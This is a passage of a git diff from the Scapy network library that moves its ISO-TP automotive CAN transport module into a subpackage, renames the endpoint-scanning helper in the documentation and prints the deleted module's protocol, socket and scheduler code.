scapy/contrib/automotive/bmw/hsfz.py scapy/contrib/automotive/doip.py scapy/contrib/automotive/ecu.py @@ -54,5 +53,10 @@ scapy/contrib/automotive/uds_ecu_states.py scapy/contrib/automotive/uds_logging.py scapy/contrib/cansocket_native.py scapy/contrib/cansocket_python_can.py -scapy/contrib/isotp.py +#scapy/contrib/http2.py # needs to be fixed +scapy/contrib/isotp/isotp_native_socket.py +scapy/contrib/isotp/isotp_packet.py +scapy/contrib/isotp/isotp_scanner.py +scapy/contrib/isotp/isotp_soft_socket.py +scapy/contrib/isotp/isotp_utils.py scapy/contrib/roce.py diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 83fc509df26..285274d556a 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -43,7 +43,7 @@ function to get all information about one specific protocol. | | | | | | | ISOTPSniffer, ISOTPMessageBuilder, ISOTPSession | | | | | -| | | ISOTPHeader, ISOTPHeaderEA, ISOTPScan | +| | | ISOTPHeader, ISOTPHeaderEA, isotp_scan | | | | | | | | ISOTP, ISOTP_SF, ISOTP_FF, ISOTP_CF, ISOTP_FC | +----------------------+----------------------+--------------------------------------------------------+ @@ -930,10 +930,10 @@ Close sockets:: isoTpSocketVCan1.close() -ISOTPScan and ISOTPScanner --------------------------- +isotp_scan and ISOTPScanner +--------------------------- -ISOTPScan is a utility function to find ISOTP-Endpoints on a CAN-Bus. +isotp_scan is a utility function to find ISOTP-Endpoints on a CAN-Bus. ISOTPScanner is a commandline-utility for the identical function. .. image:: ../graphics/animations/animation-scapy-isotpscan.svg @@ -989,7 +989,7 @@ Interactive shell usage example:: >>> conf.contribs['CANSocket'] = {'use-python-can': False} >>> load_contrib('cansocket') >>> load_contrib('isotp') - >>> socks = ISOTPScan(CANSocket("vcan0"), range(0x700, 0x800), can_interface="vcan0") + >>> socks = isotp_scan(CANSocket("vcan0"), range(0x700, 0x800), can_interface="vcan0") >>> socks [< at 0x7f98e27c8210>, < at 0x7f98f9079cd0>, diff --git a/scapy/contrib/automotive/kwp.py b/scapy/contrib/automotive/kwp.py index dd284543c82..55730629fdd 100644 --- a/scapy/contrib/automotive/kwp.py +++ b/scapy/contrib/automotive/kwp.py @@ -92,7 +92,7 @@ class KWP(ISOTP): 0x7f: 'NegativeResponse'}) # type: Dict[int, str] name = 'KWP' fields_desc = [ - XByteEnumField('service', 0, services) # type: ignore + XByteEnumField('service', 0, services) ] def answers(self, other): diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py deleted file mode 100644 index a2e8f64c588..00000000000 --- a/scapy/contrib/isotp.py +++ /dev/null @@ -1,2484 +0,0 @@ -# This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Nils Weiss -# Copyright (C) Enrico Pozzobon -# Copyright (C) Alexander Schroeder -# This program is published under a GPLv2 license - -# scapy.contrib.description = ISO-TP (ISO 15765-2) -# scapy.contrib.status = loads - -""" -ISOTPSocket. -""" - -import ctypes -from ctypes.util import find_library -import struct -import socket -import time -import traceback -import heapq -from threading import Thread, Event, Lock - -from scapy.compat import Iterable, Optional, Union, List, Tuple, Dict, Any, \ - Type, cast, Callable, TYPE_CHECKING -from scapy.utils import EDecimal -from scapy.packet import Packet -from scapy.fields import BitField, FlagsField, StrLenField, \ - ThreeBytesField, XBitField, ConditionalField, \ - BitEnumField, ByteField, XByteField, BitFieldLenField, StrField -from scapy.compat import chb, orb -from scapy.layers.can import CAN, CAN_MAX_IDENTIFIER, CAN_MTU, CAN_MAX_DLEN -import scapy.modules.six as six -from scapy.modules.six.moves import queue -from scapy.error import Scapy_Exception, warning, log_loading, log_runtime -from scapy.supersocket import SuperSocket -from scapy.data import SO_TIMESTAMPNS -from scapy.config import conf -from scapy.consts import LINUX -from scapy.contrib.cansocket import PYTHON_CAN -from scapy.sendrecv import sniff -from scapy.sessions import DefaultSession - -if TYPE_CHECKING: - from scapy.contrib.cansocket import CANSocket - -__all__ = ["ISOTP", "ISOTPHeader", "ISOTPHeaderEA", "ISOTP_SF", "ISOTP_FF", - "ISOTP_CF", "ISOTP_FC", "ISOTPSoftSocket", "ISOTPSession", - "ISOTPSocket", "ISOTPSocketImplementation", "ISOTPMessageBuilder", - "ISOTPScan"] - -USE_CAN_ISOTP_KERNEL_MODULE = False -if six.PY3 and LINUX: - LIBC = ctypes.cdll.LoadLibrary(find_library("c")) # type: ignore - try: - if conf.contribs['ISOTP']['use-can-isotp-kernel-module']: - USE_CAN_ISOTP_KERNEL_MODULE = True - except KeyError: - log_loading.info("Specify 'conf.contribs['ISOTP'] = " - "{'use-can-isotp-kernel-module': True}' to enable " - "usage of can-isotp kernel module.") - -ISOTP_MAX_DLEN_2015 = (1 << 32) - 1 # Maximum for 32-bit FF_DL -ISOTP_MAX_DLEN = (1 << 12) - 1 # Maximum for 12-bit FF_DL - -N_PCI_SF = 0x00 # /* single frame */ -N_PCI_FF = 0x10 # /* first frame */ -N_PCI_CF = 0x20 # /* consecutive frame */ -N_PCI_FC = 0x30 # /* flow control */ - - -class ISOTP(Packet): - """Packet class for ISOTP messages. This class contains additional - slots for source address (src), destination address (dst), - extended source address (exsrc) and - extended destination address (exdst) information. This information - gets filled from ISOTPSockets or the ISOTPMessageBuilder, if it - is available. Address information is not used for Packet comparison. - - :param args: Arguments for Packet init, for example bytes string - :param kwargs: Keyword arguments for Packet init. - """ - name = 'ISOTP' - fields_desc = [ - StrField('data', b"") - ] - __slots__ = Packet.__slots__ + ["src", "dst", "exsrc", "exdst"] - - def __init__(self, *args, **kwargs): - # type: (Any, Any) -> None - self.src = kwargs.pop("src", None) # type: Optional[int] - self.dst = kwargs.pop("dst", None) # type: Optional[int] - self.exsrc = kwargs.pop("exsrc", None) # type: Optional[int] - self.exdst = kwargs.pop("exdst", None) # type: Optional[int] - Packet.__init__(self, *args, **kwargs) - self.validate_fields() - - def validate_fields(self): - # type: () -> None - """Helper function to validate information in src, dst, exsrc and exdst - slots - """ - if self.src is not None: - if not 0 <= self.src <= CAN_MAX_IDENTIFIER: - raise Scapy_Exception("src is not a valid CAN identifier") - if self.dst is not None: - if not 0 <= self.dst <= CAN_MAX_IDENTIFIER: - raise Scapy_Exception("dst is not a valid CAN identifier") - if self.exsrc is not None: - if not 0 <= self.exsrc <= 0xff: - raise Scapy_Exception("exsrc is not a byte") - if self.exdst is not None: - if not 0 <= self.exdst <= 0xff: - raise Scapy_Exception("exdst is not a byte") - - def fragment(self, *args, **kargs): - # type: (*Any, **Any) -> List[Packet] - """Helper function to fragment an ISOTP message into multiple - CAN frames. - - :return: A list of CAN frames - """ - data_bytes_in_frame = 7 - if self.exdst is not None: - data_bytes_in_frame = 6 - - if len(self.data) > ISOTP_MAX_DLEN_2015: - raise Scapy_Exception("Too much data in ISOTP message") - - if len(self.data) <= data_bytes_in_frame: - # We can do this in a single frame - frame_data = struct.pack('B', len(self.data)) + self.data - if self.exdst: - frame_data = struct.pack('B', self.exdst) + frame_data - - if self.dst is None or self.dst <= 0x7ff: - pkt = CAN(identifier=self.dst, data=frame_data) - else: - pkt = CAN(identifier=self.dst, flags="extended", - data=frame_data) - return [pkt] - - # Construct the first frame - if len(self.data) <= ISOTP_MAX_DLEN: - frame_header = struct.pack(">H", len(self.data) + 0x1000) - else: - frame_header = struct.pack(">HI", 0x1000, len(self.data)) - if self.exdst: - frame_header = struct.pack('B', self.exdst) + frame_header - idx = 8 - len(frame_header) - frame_data = self.data[0:idx] - if self.dst is None or self.dst <= 0x7ff: - frame = CAN(identifier=self.dst, data=frame_header + frame_data) - else: - frame = CAN(identifier=self.dst, flags="extended", - data=frame_header + frame_data) - - # Construct consecutive frames - n = 1 - pkts = [frame] - while idx < len(self.data): - frame_data = self.data[idx:idx + data_bytes_in_frame] - frame_header = struct.pack("b", (n % 16) + N_PCI_CF) - - n += 1 - idx += len(frame_data) - - if self.exdst: - frame_header = struct.pack('B', self.exdst) + frame_header - if self.dst is None or self.dst <= 0x7ff: - pkt = CAN(identifier=self.dst, data=frame_header + frame_data) - else: - pkt = CAN(identifier=self.dst, flags="extended", - data=frame_header + frame_data) - pkts.append(pkt) - return pkts - - @staticmethod - def defragment(can_frames, use_extended_addressing=None): - # type: (List[Packet], Optional[bool]) -> Optional[ISOTP] - """Helper function to defragment a list of CAN frames to one ISOTP - message - - :param can_frames: A list of CAN frames - :param use_extended_addressing: Specify if extended ISO-TP addressing - is used in the packets for - defragmentation. - :return: An ISOTP message containing the data of the CAN frames or None - """ - if len(can_frames) == 0: - raise Scapy_Exception("ISOTP.defragment called with 0 frames") - - dst = can_frames[0].identifier - if any(frame.identifier != dst for frame in can_frames): - warning("Not all CAN frames have the same identifier") - - parser = ISOTPMessageBuilder(use_extended_addressing) - parser.feed(can_frames) - - results = [] - for p in parser: - if (use_extended_addressing is True and p.exdst is not None) \ - or (use_extended_addressing is False and p.exdst is None) \ - or (use_extended_addressing is None): - results.append(p) - - if not results: - return None - - if len(results) > 1: - warning("More than one ISOTP frame could be defragmented from the " - "provided CAN frames, only returning the first one.") - - return results[0] - - -class ISOTPHeader(CAN): - name = 'ISOTPHeader' - fields_desc = [ - FlagsField('flags', 0, 3, ['error', - 'remote_transmission_request', - 'extended']), - XBitField('identifier', 0, 29), - ByteField('length', None), - ThreeBytesField('reserved', 0) - ] - - def extract_padding(self, p): - # type: (bytes) -> Tuple[bytes, Optional[bytes]] - return p, None - - def post_build(self, pkt, pay): - # type: (bytes, bytes) -> bytes - """ - This will set the ByteField 'length' to the correct value. - """ - if self.length is None: - pkt = pkt[:4] + chb(len(pay)) + pkt[5:] - return pkt + pay - - def guess_payload_class(self, payload): - # type: (bytes) -> Type[Packet] - """ISO-TP encodes the frame type in the first nibble of a frame. This - is used to determine the payload_class - - :param payload: payload bytes string - :return: Type of payload class - """ - t = (orb(payload[0]) & 0xf0) >> 4 - if t == 0: - return ISOTP_SF - elif t == 1: - return ISOTP_FF - elif t == 2: - return ISOTP_CF - else: - return ISOTP_FC - - -class ISOTPHeaderEA(ISOTPHeader): - name = 'ISOTPHeaderExtendedAddress' - fields_desc = [ - FlagsField('flags', 0, 3, ['error', - 'remote_transmission_request', - 'extended']), - XBitField('identifier', 0, 29), - ByteField('length', None), - ThreeBytesField('reserved', 0), - XByteField('extended_address', 0) - ] - - def post_build(self, p, pay): - # type: (bytes, bytes) -> bytes - """ - This will set the ByteField 'length' to the correct value. - 'chb(len(pay) + 1)' is required, because the field 'extended_address' - is counted as payload on the CAN layer - """ - if self.length is None: - p = p[:4] + chb(len(pay) + 1) + p[5:] - return p + pay - - -ISOTP_TYPE = {0: 'single', - 1: 'first', - 2: 'consecutive', - 3: 'flow_control'} - - -class ISOTP_SF(Packet): - name = 'ISOTPSingleFrame' - fields_desc = [ - BitEnumField('type', 0, 4, ISOTP_TYPE), - BitFieldLenField('message_size', None, 4, length_of='data'), - StrLenField('data', b'', length_from=lambda pkt: pkt.message_size) - ] - - -class ISOTP_FF(Packet): - name = 'ISOTPFirstFrame' - fields_desc = [ - BitEnumField('type', 1, 4, ISOTP_TYPE), - BitField('message_size', 0, 12), - ConditionalField(BitField('extended_message_size', 0, 32), - lambda pkt: pkt.message_size == 0), - StrField('data', b'', fmt="B") - ] - - -class ISOTP_CF(Packet): - name = 'ISOTPConsecutiveFrame' - fields_desc = [ - BitEnumField('type', 2, 4, ISOTP_TYPE), - BitField('index', 0, 4), - StrField('data', b'', fmt="B") - ] - - -class ISOTP_FC(Packet): - name = 'ISOTPFlowControlFrame' - fields_desc = [ - BitEnumField('type', 3, 4, ISOTP_TYPE), - BitEnumField('fc_flag', 0, 4, {0: 'continue', - 1: 'wait', - 2: 'abort'}), - ByteField('block_size', 0), - ByteField('separation_time', 0), - ] - - -class ISOTPMessageBuilderIter(object): - """ - Iterator class for ISOTPMessageBuilder - """ - slots = ["builder"] - - def __init__(self, builder): - # type: (ISOTPMessageBuilder) -> None - self.builder = builder - - def __iter__(self): - # type: () -> ISOTPMessageBuilderIter - return self - - def __next__(self): - # type: () -> ISOTP - while self.builder.count: - p = self.builder.pop() - if p is None: - break - else: - return p - raise StopIteration - - next = __next__ - - -class ISOTPMessageBuilder(object): - """ - Initialize a ISOTPMessageBuilder object - - Utility class to build ISOTP messages out of CAN frames, used by both - ISOTP.defragment() and ISOTPSession. - - This class attempts to interpret some CAN frames as ISOTP frames, both with - and without extended addressing at the same time. For example, if an - extended address of 07 is being used, all frames will also be interpreted - as ISOTP single-frame messages. - - CAN frames are fed to an ISOTPMessageBuilder object with the feed() method - and the resulting ISOTP frames can be extracted using the pop() method. - - :param use_ext_addr: True for only attempting to defragment with - extended addressing, False for only attempting - to defragment without extended addressing, - or None for both - :param did: Destination Identifier - :param basecls: The class of packets that will be returned, - defaults to ISOTP - """ - - class Bucket(object): - """ - Helper class to store not finished ISOTP messages while building. - """ - - def __init__(self, total_len, first_piece, ts): - # type: (int, bytes, Union[EDecimal, float]) -> None - self.pieces = list() # type: List[bytes] - self.total_len = total_len - self.current_len = 0 - self.ready = None # type: Optional[bytes] - self.src = None # type: Optional[int] - self.exsrc = None # type: Optional[int] - self.time = ts # type: Union[float, EDecimal] - self.push(first_piece) - - def push(self, piece): - # type: (bytes) -> None - self.pieces.append(piece) - self.current_len += len(piece) - if self.current_len >= self.total_len: - if six.PY3: - isotp_data = b"".join(self.pieces) - else: - isotp_data = "".join(map(str, self.pieces)) - self.ready = isotp_data[:self.total_len] - - def __init__( - self, - use_ext_addr=None, # type: Optional[bool] - did=None, # type: Optional[Union[int, List[int], Iterable[int]]] - basecls=ISOTP # type: Type[Packet] - ): - # type: (...) -> None - self.ready = [] # type: List[Tuple[int, Optional[int], ISOTPMessageBuilder.Bucket]] # noqa: E501 - self.buckets = {} # type: Dict[Tuple[Optional[int], int, int], ISOTPMessageBuilder.Bucket] # noqa: E501 - self.use_ext_addr = use_ext_addr - self.basecls = basecls - self.dst_ids = None # type: Optional[Iterable[int]] - self.last_ff = None # type: Optional[Tuple[Optional[int], int, int]] - self.last_ff_ex = None # type: Optional[Tuple[Optional[int], int, int]] # noqa: E501 - if did is not None: - if isinstance(did, list): - self.dst_ids = did - elif isinstance(did, int): - self.dst_ids = [did] - elif hasattr(did, "__iter__"): - self.dst_ids = did - else: - raise TypeError("Invalid type for argument did!") - - def feed(self, can): - # type: (Union[Iterable[Packet], Packet]) -> None - """Attempt to feed an incoming CAN frame into the state machine""" - if not isinstance(can, Packet) and hasattr(can, "__iter__"): - for p in can: - self.feed(p) - return - - if not isinstance(can, Packet): - return - - if self.dst_ids is not None and can.identifier not in self.dst_ids: - return - - data = bytes(can.data) - - if len(data) > 1 and self.use_ext_addr is not True: - self._try_feed(can.identifier, None, data, can.time) - if len(data) > 2 and self.use_ext_addr is not False: - ea = six.indexbytes(data, 0) - self._try_feed(can.identifier, ea, data[1:], can.time) - - @property - def count(self): - # type: () -> int - """Returns the number of ready ISOTP messages built from the provided - can frames - - :return: Number of ready ISOTP messages - """ - return len(self.ready) - - def __len__(self): - # type: () -> int - return self.count - - def pop(self, identifier=None, ext_addr=None): - # type: (Optional[int], Optional[int]) -> Optional[Packet] - """Returns a built ISOTP message - - :param identifier: if not None, only return isotp messages with this - destination - :param ext_addr: if identifier is not None, only return isotp messages - with this extended address for destination - :returns: an ISOTP packet, or None if no message is ready - """ - - if identifier is not None: - for i in range(len(self.ready)): - b = self.ready[i] - iden = b[0] - ea = b[1] - if iden == identifier and ext_addr == ea: - return ISOTPMessageBuilder._build(self.ready.pop(i), - self.basecls) - return None - - if len(self.ready) > 0: - return ISOTPMessageBuilder._build(self.ready.pop(0), self.basecls) - return None - - def __iter__(self): - # type: () -> ISOTPMessageBuilderIter - return ISOTPMessageBuilderIter(self) - - @staticmethod - def _build( - t, # type: Tuple[int, Optional[int], ISOTPMessageBuilder.Bucket] - basecls=ISOTP # type: Type[Packet] - ): - # type: (...) -> Packet - bucket = t[2] - data = bucket.ready or b"" - p = basecls(data) - if hasattr(p, "dst"): - p.dst = t[0] - if hasattr(p, "exdst"): - p.exdst = t[1] - if hasattr(p, "src"): - p.src = bucket.src - if hasattr(p, "exsrc"): - p.exsrc = bucket.exsrc - if hasattr(p, "time"): - p.time = bucket.time - return p - - def _feed_first_frame(self, identifier, ea, data, ts): - # type: (int, Optional[int], bytes, Union[EDecimal, float]) -> bool - if len(data) < 3: - # At least 3 bytes are necessary: 2 for length and 1 for data - return False - - header = struct.unpack('>H', bytes(data[:2]))[0] - expected_length = header & 0x0fff - isotp_data = data[2:] - if expected_length == 0 and len(data) >= 6: - expected_length = struct.unpack('>I', bytes(data[2:6]))[0] - isotp_data = data[6:] - - key = (ea, identifier, 1) - if ea is None: - self.last_ff = key - else: - self.last_ff_ex = key - self.buckets[key] = self.Bucket(expected_length, isotp_data, ts) - return True - - def _feed_single_frame(self, identifier, ea, data, ts): - # type: (int, Optional[int], bytes, Union[EDecimal, float]) -> bool - if len(data) < 2: - # At least 2 bytes are necessary: 1 for length and 1 for data - return False - - length = six.indexbytes(data, 0) & 0x0f - isotp_data = data[1:length + 1] - - if length > len(isotp_data): - # CAN frame has less data than expected - return False - - self.ready.append((identifier, ea, - self.Bucket(length, isotp_data, ts))) - return True - - def _feed_consecutive_frame(self, identifier, ea, data): - # type: (int, Optional[int], bytes) -> bool - if len(data) < 2: - # At least 2 bytes are necessary: 1 for sequence number and - # 1 for data - return False - - first_byte = six.indexbytes(data, 0) - seq_no = first_byte & 0x0f - isotp_data = data[1:] - - key = (ea, identifier, seq_no) - bucket = self.buckets.pop(key, None) - - if bucket is None: - # There is no message constructor waiting for this frame - return False - - bucket.push(isotp_data) - if bucket.ready is None: - # full ISOTP message is not ready yet, put it back in - # buckets list - next_seq = (seq_no + 1) % 16 - key = (ea, identifier, next_seq) - self.buckets[key] = bucket - else: - self.ready.append((identifier, ea, bucket)) - - return True - - def _feed_flow_control_frame(self, identifier, ea, data): - # type: (int, Optional[int], bytes) -> bool - if len(data) < 3: - # At least 2 bytes are necessary: 1 for sequence number and - # 1 for data - return False - - keys = [x for x in (self.last_ff, self.last_ff_ex) if x is not None] - buckets = [self.buckets.pop(k, None) for k in keys] - - self.last_ff = None - self.last_ff_ex = None - - if not any(buckets) or not any(keys): - # There is no message constructor waiting for this frame - return False - - for key, bucket in zip(keys, buckets): - if bucket is None: - continue - bucket.src = identifier - bucket.exsrc = ea - self.buckets[key] = bucket - return True - - def _try_feed(self, identifier, ea, data, ts): - # type: (int, Optional[int], bytes, Union[EDecimal, float]) -> None - first_byte = six.indexbytes(data, 0) - if len(data) > 1 and first_byte & 0xf0 == N_PCI_SF: - self._feed_single_frame(identifier, ea, data, ts) - if len(data) > 2 and first_byte & 0xf0 == N_PCI_FF: - self._feed_first_frame(identifier, ea, data, ts) - if len(data) > 1 and first_byte & 0xf0 == N_PCI_CF: - self._feed_consecutive_frame(identifier, ea, data) - if len(data) > 1 and first_byte & 0xf0 == N_PCI_FC: - self._feed_flow_control_frame(identifier, ea, data) - - -class ISOTPSession(DefaultSession): - """Defragment ISOTP packets 'on-the-flow'. - - Usage: - >>> sniff(session=ISOTPSession) - """ - - def __init__(self, *args, **kwargs): - # type: (Any, Any) -> None - super(ISOTPSession, self).__init__(*args, **kwargs) - self.m = ISOTPMessageBuilder( - use_ext_addr=kwargs.pop("use_ext_addr", None), - did=kwargs.pop("did", None), - basecls=kwargs.pop("basecls", ISOTP)) - - def on_packet_received(self, pkt): - # type: (Optional[Packet]) -> None - if not pkt: - return - self.m.feed(pkt) - while len(self.m) > 0: - rcvd = self.m.pop() - if self._supersession: - self._supersession.on_packet_received(rcvd) - else: - super(ISOTPSession, self).on_packet_received(rcvd) - - -class ISOTPSoftSocket(SuperSocket): - """ - This class is a wrapper around the ISOTPSocketImplementation, for the - reasons described below. - - The ISOTPSoftSocket aims to be fully compatible with the Linux ISOTP - sockets provided by the can-isotp kernel module, while being usable on any - operating system. - Therefore, this socket needs to be able to respond to an incoming FF frame - with a FC frame even before the recv() method is called. - A thread is needed for receiving CAN frames in the background, and since - the lower layer CAN implementation is not guaranteed to have a functioning - POSIX select(), each ISOTP socket needs its own CAN receiver thread. - SuperSocket automatically calls the close() method when the GC destroys an - ISOTPSoftSocket. However, note that if any thread holds a reference to - an ISOTPSoftSocket object, it will not be collected by the GC. - - The implementation of the ISOTP protocol, along with the necessary - thread, are stored in the ISOTPSocketImplementation class, and therefore: - - * There no reference from ISOTPSocketImplementation to ISOTPSoftSocket - * ISOTPSoftSocket can be normally garbage collected - * Upon destruction, ISOTPSoftSocket.close() will be called - * ISOTPSoftSocket.close() will call ISOTPSocketImplementation.close() - * RX background thread can be stopped by the garbage collector - - Initialize an ISOTPSoftSocket using the provided underlying can socket. - - Example (with NativeCANSocket underneath): - >>> conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} - >>> load_contrib('isotp') - >>> with ISOTPSocket("can0", sid=0x641, did=0x241) as sock: - >>> sock.send(...) - - Example (with PythonCANSocket underneath): - >>> conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} - >>> conf.contribs['CANSocket'] = {'use-python-can': True} - >>> load_contrib('isotp') - >>> with ISOTPSocket(CANSocket(bustype='socketcan', channel="can0"), sid=0x641, did=0x241) as sock: - >>> sock.send(...) - - :param can_socket: a CANSocket instance, preferably filtering only can - frames with identifier equal to did - :param sid: the CAN identifier of the sent CAN frames - :param did: the CAN identifier of the received CAN frames - :param extended_addr: the extended address of the sent ISOTP frames - (can be None) - :param extended_rx_addr: the extended address of the received ISOTP - frames (can be None) - :param rx_block_size: block size sent in Flow Control ISOTP frames - :param rx_separation_time_min: minimum desired separation time sent in - Flow Control ISOTP frames - :param padding: If True, pads sending packets with 0x00 which not - count to the payload. - Does not affect receiving packets. - :param basecls: base class of the packets emitted by this socket - """ # noqa: E501 - - nonblocking_socket = True - - def __init__(self, - can_socket=None, # type: Optional["CANSocket"] - sid=0, # type: int - did=0, # type: int - extended_addr=None, # type: Optional[int] - extended_rx_addr=None, # type: Optional[int] - rx_block_size=0, # type: int - rx_separation_time_min=0, # type: int - padding=False, # type: bool - listen_only=False, # type: bool - basecls=ISOTP # type: Type[Packet] - ): - # type: (...) -> None - - if six.PY3 and LINUX and isinstance(can_socket, six.string_types): - from scapy.contrib.cansocket_native import NativeCANSocket - can_socket = NativeCANSocket(can_socket) - elif isinstance(can_socket, six.string_types): - raise Scapy_Exception("Provide a CANSocket object instead") - - self.exsrc = extended_addr - self.exdst = extended_rx_addr - self.src = sid - self.dst = did - - impl = ISOTPSocketImplementation( - can_socket, - src_id=sid, - dst_id=did, - padding=padding, - extended_addr=extended_addr, - extended_rx_addr=extended_rx_addr, - rx_block_size=rx_block_size, - rx_separation_time_min=rx_separation_time_min, - listen_only=listen_only - ) - - # Cast for compatibility to functions from SuperSocket. - self.ins = cast(socket.socket, impl) - self.outs = cast(socket.socket, impl) - self.impl = impl - self.basecls = basecls - if basecls is None: - warning('Provide a basecls ') - - def close(self): - # type: () -> None - if not self.closed: - self.impl.close() - self.closed = True - - def begin_send(self, p): - # type: (Packet) -> int - """Begin the transmission of message p. This method returns after - sending the first frame. If multiple frames are necessary to send the - message, this socket will unable to send other messages until either - the transmission of this frame succeeds or it fails.""" - - if not self.closed: - if hasattr(p, "sent_time"): - p.sent_time = time.time() - self.impl.begin_send(bytes(p)) - return len(p) - else: - return 0 - - def recv_raw(self, x=0xffff): - # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 - """Receive a complete ISOTP message, blocking until a message is - received or the specified timeout is reached. - If self.timeout is 0, then this function doesn't block and returns the - first frame in the receive buffer or None if there isn't any.""" - if not self.closed: - tup = self.impl.recv() - if tup is not None: - return self.basecls, tup[0], float(tup[1]) - return self.basecls, None, None - - def recv(self, x=0xffff): - # type: (int) -> Optional[Packet] - msg = super(ISOTPSoftSocket, self).recv(x) - if msg is None: - return None - - if hasattr(msg, "src"): - msg.src = self.src - if hasattr(msg, "dst"): - msg.dst = self.dst - if hasattr(msg, "exsrc"): - msg.exsrc = self.exsrc - if hasattr(msg, "exdst"): - msg.exdst = self.exdst - return msg - - @staticmethod - def select(sockets, remain=None): - # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] - """This function is called during sendrecv() routine to wait for - sockets to be ready to receive - """ - - def find_ready_sockets(socks): - # type: (List[SuperSocket]) -> List[SuperSocket] - return [x for x in socks if isinstance(x, ISOTPSoftSocket) and - not x.closed and not x.impl.rx_queue.empty()] - - ready_sockets = find_ready_sockets(sockets) - - blocking = remain != 0 - if len(ready_sockets) > 0 or not blocking: - return ready_sockets - - exit_select = Event() - - def my_cb(msg): - # type: (Any) -> None - exit_select.set() - - try: - for s in sockets: - if not s.closed and isinstance(s, ISOTPSoftSocket): - s.impl.rx_callbacks.append(my_cb) - - exit_select.wait(remain) - - finally: - for s in sockets: - if isinstance(s, ISOTPSoftSocket): - try: - s.impl.rx_callbacks.remove(my_cb) - except (ValueError, AttributeError): - pass - - ready_sockets = find_ready_sockets(sockets) - return ready_sockets - - -ISOTPSocket = ISOTPSoftSocket # type: Union[Type[ISOTPSoftSocket], Type[ISOTPNativeSocket]] # noqa: E501 - - -class CANReceiverThread(Thread): - """ - Helper class that receives CAN frames and feeds them to the provided - callback. It relies on CAN frames being enqueued in the CANSocket object - and not being lost if they come before the sniff method is called. This is - true in general since sniff is usually implemented as repeated recv(), but - might be false in some implementation of CANSocket - - Initialize the thread. In order for this thread to be able to be - stopped by the destructor of another object, it is important to not - keep a reference to the object in the callback function. - - :param socket: the CANSocket upon which this class will call the - sniff() method - :param callback: function to call whenever a CAN frame is received - """ - - def __init__(self, can_socket, callback): - # type: ("CANSocket", Callable[[Packet], None]) -> None - self.socket = can_socket - self.callback = callback - self.exiting = False - self._thread_started = Event() - self.exception = None # type: Optional[Exception] - - Thread.__init__(self) - self.name = "CANReceiver" + self.name - - def start(self): - # type: () -> None - Thread.start(self) - if not self._thread_started.wait(5): - raise Scapy_Exception("CAN RX thread not started in 5s.") - - def run(self): - # type: () -> None - self._thread_started.set() - try: - def prn(msg): - # type: (Packet) -> None - if not self.exiting: - self.callback(msg) - - while 1: - try: - sniff(store=False, timeout=1, count=1, - stop_filter=lambda x: self.exiting, - prn=prn, opened_socket=self.socket) - except ValueError as ex: - if not self.exiting: - raise ex - if self.exiting: - return - except Exception as e: - self.exception = e - - def stop(self): - # type: () -> None - self.exiting = True - - -class TimeoutScheduler: - """A timeout scheduler which uses a single thread for all timeouts, unlike - python's own Timer objects which use a thread each.""" - VERBOSE = False - GRACE = .1 - _mutex = Lock() - _event = Event() - _thread = None # type: Optional[Thread] - - # use heapq functions on _handles! - _handles = [] # type: List[TimeoutScheduler.Handle] - - @staticmethod - def schedule(timeout, callback): - # type: (float, Callable[[], None]) -> TimeoutScheduler.Handle - """Schedules the execution of a timeout. - - The function `callback` will be called in `timeout` seconds. - - Returns a handle that can be used to remove the timeout.""" - when = TimeoutScheduler._time() + timeout - handle = TimeoutScheduler.Handle(when, callback) - handles = TimeoutScheduler._handles - - with TimeoutScheduler._mutex: - # Add the handler to the heap, keeping the invariant - # Time complexity is O(log n) - heapq.heappush(handles, handle) - must_interrupt = (handles[0] == handle) - - # Start the scheduling thread if it is not started already - if TimeoutScheduler._thread is None: - t = Thread(target=TimeoutScheduler._task, - name="TimeoutScheduler._task") - must_interrupt = False - TimeoutScheduler._thread = t - TimeoutScheduler._event.clear() - t.start() - - if must_interrupt: - # if the new timeout got in front of the one we are currently - # waiting on, the current wait operation must be aborted and - # updated with the new timeout - TimeoutScheduler._event.set() - - # Return the handle to the timeout so that the user can cancel it - return handle - - @staticmethod - def cancel(handle): - # type: (TimeoutScheduler.Handle) -> None - """Provided its handle, cancels the execution of a timeout.""" - - handles = TimeoutScheduler._handles - with TimeoutScheduler._mutex: - if handle in handles: - # Time complexity is O(n) - handle._cb = None - handles.remove(handle) - heapq.heapify(handles) - - if len(handles) == 0: - # set the event to stop the wait - this kills the thread - TimeoutScheduler._event.set() - else: - raise Scapy_Exception("Handle not found") - - @staticmethod - def clear(): - # type: () -> None - """Cancels the execution of all timeouts.""" - with TimeoutScheduler._mutex: - TimeoutScheduler._handles.clear() - - # set the event to stop the wait - this kills the thread - TimeoutScheduler._event.set() - - @staticmethod - def _peek_next(): - # type: () -> Optional[TimeoutScheduler.Handle] - """Returns the next timeout to execute, or `None` if list is empty, - without modifying the list""" - with TimeoutScheduler._mutex: - handles = TimeoutScheduler._handles - if len(handles) == 0: - return None - else: - return handles[0] - - @staticmethod - def _wait(handle): - # type: (Optional[TimeoutScheduler.Handle]) -> None - """Waits until it is time to execute the provided handle, or until - another thread calls _event.set()""" - - if handle is None: - when = TimeoutScheduler.GRACE - else: - when = handle._when - - # Check how much time until the next timeout - now = TimeoutScheduler._time() - to_wait = when - now - - # Wait until the next timeout, - # or until event.set() gets called in another thread. - if to_wait > 0: - log_runtime.debug("TimeoutScheduler Thread going to sleep @ %f " + - "for %fs", now, to_wait) - interrupted = TimeoutScheduler._event.wait(to_wait) - new = TimeoutScheduler._time() - log_runtime.debug("TimeoutScheduler Thread awake @ %f, slept for" + - " %f, interrupted=%d", new, new - now, - interrupted) - - # Clear the event so that we can wait on it again, - # Must be done before doing the callbacks to avoid losing a set(). - TimeoutScheduler._event.clear() - - @staticmethod - def _task(): - # type: () -> None - """Executed in a background thread, this thread will automatically - start when the first timeout is added and stop when the last timeout - is removed or executed.""" - - log_runtime.debug("TimeoutScheduler Thread spawning @ %f", - TimeoutScheduler._time()) - - time_empty = None - - try: - while 1: - handle = TimeoutScheduler._peek_next() - if handle is None: - now = TimeoutScheduler._time() - if time_empty is None: - time_empty = now - 